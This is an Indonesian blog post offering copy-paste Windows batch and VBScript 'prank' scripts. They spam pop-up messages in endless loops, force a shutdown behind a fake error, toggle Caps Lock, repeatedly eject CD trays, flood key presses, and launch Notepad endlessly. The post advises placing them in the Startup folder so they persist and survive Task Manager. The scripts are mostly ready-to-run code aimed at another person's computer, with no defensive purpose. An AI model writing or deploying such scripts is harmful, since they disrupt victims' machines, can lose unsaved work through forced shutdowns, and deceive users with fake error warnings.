Wednesday, June 14, 2017

Membuat Script Iseng dengan Notepad


Buat kamu yang suka iseng atau jail silahkan di coba yah.. 
Ini script untuk menyenangkan hati kita ajah..  hahaaaaa*!!
MRC1404- 

Langkah-langkah :
- Open notepad lalu seperti biasa tinggal ''copas''script di bawah.
- Jadi filenya cukup di taro di startUp nantinya.
- Lalu double klick pada script yang kita buat.
 Bikin message yang nongol terus-terusan :
@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC pean kaya'y ngaco....
msg * Udah install ulang aja, bawa ktmpt coel.....
msg * Biar masalah nya beres....


msg * Hahahahaha....
GOTO BEGIN

save namafile ( .BAT )

- Kejadian yg udah2 biar katA d kill d task manager, masih tetep ja nongol ntu message

------------------------------------------------------------------------------------


Bikin Shutdown trus da Messagenya :
@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"

save namafile ( .BAT )


------------------------------------------------------------------------------------


Maenin Caps Lock :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile ( .vbs )


------------------------------------------------------------------------------------

Maenin CD/DVD biar buka tutup mulu :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile ( .vbs )


------------------------------------------------------------------------------------

Bikin vbscript nongol mlulu :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile ( .vbs )

- Kejadian yg udah2 di task manager jadi full wscript yg lg running


------------------------------------------------------------------------------------

Membuat tombol Backspace neken mlulu :
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile ( .vbs )


------------------------------------------------------------------------------------

Bikin otomatis ngetik "Erorr!!!" di notepad/word :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Erorr!!!"
loop

save namafile ( .vbs )


------------------------------------------------------------------------------------

Bikin supaya buka notepad mulu :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile ( .BAT )

- Ati - ati soalnya ini script kalau mnurut aku paling ngeselin bgt....
- Klo mau yg kluar bkn notepad tinggal rubah ja DIR'y....


------------------------------------------------------------------------------------

Bikin supaya setiap buka notepad otomatis ngetik apa yg loe mau...
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"

save namafile ( .vbs )

Enter your email address:

Delivered by FeedBurner

No comments:

Post a Comment